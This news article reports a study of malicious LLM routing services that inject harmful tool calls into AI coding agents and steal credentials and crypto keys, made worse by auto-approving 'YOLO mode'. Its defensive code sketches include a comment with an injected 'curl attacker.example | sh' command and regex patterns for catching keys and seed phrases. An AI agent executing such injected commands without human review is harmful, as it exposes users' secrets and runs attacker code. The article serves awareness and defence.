Key Takeaways
- University of California study identified 26 third-party AI routing services compromising crypto security
- Researchers lost Ether from a test wallet when one router executed a theft
- These intermediary services can access all plaintext data, including wallet keys and recovery phrases
- An automation feature dubbed “YOLO mode” enables AI tools to execute commands without user approval
- Security experts urge developers to keep sensitive crypto credentials away from AI agent workflows
A team from the University of California has uncovered a significant security vulnerability: certain third-party AI routing platforms are compromising cryptocurrency developers by harvesting sensitive credentials and injecting harmful code into their development environments.
The research, released in a new paper this week, examined what the investigators termed "malicious intermediary attacks" targeting large language model (LLM) infrastructure.
These LLM routing platforms function as middlemen positioned between developers and major AI service providers such as OpenAI, Anthropic, and Google. Their purpose is to coordinate and direct API traffic across various AI platforms.
The critical security flaw stems from these routers terminating the encrypted (TLS) connection between developer and AI provider. This grants them complete, unencrypted visibility into every piece of information traveling through their systems.
Crypto developers leveraging AI programming assistants like Claude Code for building blockchain applications or cryptocurrency wallets could be unknowingly exposing private keys and recovery phrases through these routing services.
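To make the exposure concrete, here is a minimal sketch of the pattern involved: a developer points an OpenAI-compatible client at a third-party router rather than at the provider directly. The router URL and model name below are hypothetical placeholders; the point is that once the router terminates TLS, it sees the API key and the full prompt, including any secret pasted into it, in plaintext.

```python
import json

# Hypothetical router endpoint -- stands in for any third-party LLM router.
ROUTER_URL = "https://llm-router.example/v1/chat/completions"

def build_request(prompt: str, api_key: str) -> tuple[str, bytes, dict]:
    """Assemble exactly what the router sees after decrypting the request."""
    body = json.dumps({
        "model": "claude-sonnet",  # placeholder model name
        "messages": [{"role": "user", "content": prompt}],
    }).encode()
    # The API key travels in a header the router must read to forward traffic.
    headers = {"Authorization": f"Bearer {api_key}"}
    return ROUTER_URL, body, headers

# Everything returned here is plaintext from the router's point of view;
# the developer has no way to verify what the router does before forwarding.
```

If a wallet's private key or seed phrase ends up anywhere in `prompt` (for example, pasted into an agent session for debugging), it crosses the router unencrypted.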
Investigators examined 28 commercial routing platforms and an additional 400 free alternatives collected from developer communities.
Results revealed nine platforms actively embedding malicious instructions, two implementing sophisticated evasion strategies, and 17 capturing researcher-controlled Amazon Web Services access credentials.
A single router successfully extracted Ether from a honeypot wallet established by the research team. The stolen amount totaled less than $50.
According to the researchers, distinguishing between legitimate credential processing and actual theft proves virtually impossible for end users, as routing services inherently access sensitive information in unencrypted format during normal operations.
Understanding the YOLO Mode Vulnerability
The study highlighted a concerning feature present in numerous AI agent platforms known as “YOLO mode.” When activated, this setting allows AI agents to run commands instantaneously without requiring user confirmation for each action.
This automation dramatically amplifies the threat. When a routing platform inserts malicious commands, YOLO mode enables their execution without any human oversight.
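The risk is easiest to see in a stripped-down agent loop. The sketch below is illustrative (the function name and flag are hypothetical, not taken from any specific tool): with auto-approval enabled, whatever command a possibly tampered-with model returns is executed immediately.

```python
import subprocess

def run_agent_step(suggested_cmd: str, yolo_mode: bool) -> str:
    """Execute a model-suggested shell command, optionally asking first."""
    if not yolo_mode:
        # Normal mode: a human reviews every command before it runs.
        answer = input(f"Run `{suggested_cmd}`? [y/N] ")
        if answer.lower() != "y":
            return "skipped"
    # In YOLO mode this line runs unconditionally. If a router injected
    # something like `curl attacker.example | sh` into the model's reply,
    # it executes with no human review.
    result = subprocess.run(suggested_cmd, shell=True,
                            capture_output=True, text=True)
    return result.stdout
```

The confirmation prompt is the only safeguard, and YOLO mode removes it.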
Researchers also discovered that previously trustworthy routers can be covertly compromised without the service provider’s awareness. Free routing platforms, specifically, may be providing subsidized API connectivity as bait while simultaneously harvesting user credentials.
Security Guidelines from Researchers
The investigation team recommended that developers bolster client-side security measures and establish strict policies preventing private keys or seed phrases from entering AI agent sessions.
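One way such a client-side policy could be approximated is a pre-send guard that refuses to forward text resembling crypto credentials. The patterns below are coarse, illustrative heuristics of my own (a 64-character hex string for a raw private key, a long run of lowercase words for a BIP-39-style seed phrase), not part of the researchers' tooling; a real filter would need tighter rules, since the seed-phrase pattern will also flag long all-lowercase sentences.

```python
import re

# Illustrative patterns only -- not exhaustive, and prone to false positives.
HEX_KEY = re.compile(r"\b(0x)?[0-9a-fA-F]{64}\b")          # raw 256-bit key
SEED_PHRASE = re.compile(r"\b(?:[a-z]+ ){11,23}[a-z]+\b")  # 12-24 word run

def safe_to_send(text: str) -> bool:
    """Return False if the text looks like it contains a key or seed phrase."""
    return not (HEX_KEY.search(text) or SEED_PHRASE.search(text))
```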
For a sustainable solution, researchers emphasized that AI providers should implement cryptographic signatures for their outputs. This would enable developers to authenticate that instructions received by an agent genuinely originated from the legitimate model.
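The verification idea can be sketched as follows. For brevity this uses an HMAC with a shared secret from Python's standard library; the researchers' proposal implies public-key signatures (e.g. Ed25519), where only the provider holds the signing key and routers could never forge a tag. The key value here is a stand-in.

```python
import hashlib
import hmac

# Stand-in for the provider's key; a real scheme would use an asymmetric
# signature so intermediaries never hold signing material.
PROVIDER_KEY = b"demo-only-provider-key"

def sign_output(model_output: str) -> str:
    """Provider side: attach an authentication tag to the model's reply."""
    return hmac.new(PROVIDER_KEY, model_output.encode(),
                    hashlib.sha256).hexdigest()

def verify_output(model_output: str, tag: str) -> bool:
    """Client side: reject any reply a router modified in transit."""
    return hmac.compare_digest(sign_output(model_output), tag)
```

An agent that checks `verify_output` before acting would detect router-injected instructions, since any tampering invalidates the tag.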
Co-author Chaofan Shou shared on X that “26 LLM routers are secretly injecting malicious tool calls and stealing creds.”
The research team concluded that LLM API routing platforms occupy a crucial security checkpoint that the AI industry presently assumes to be trustworthy without verification.
The published paper did not include specific details such as blockchain transaction identifiers for the compromised wallet.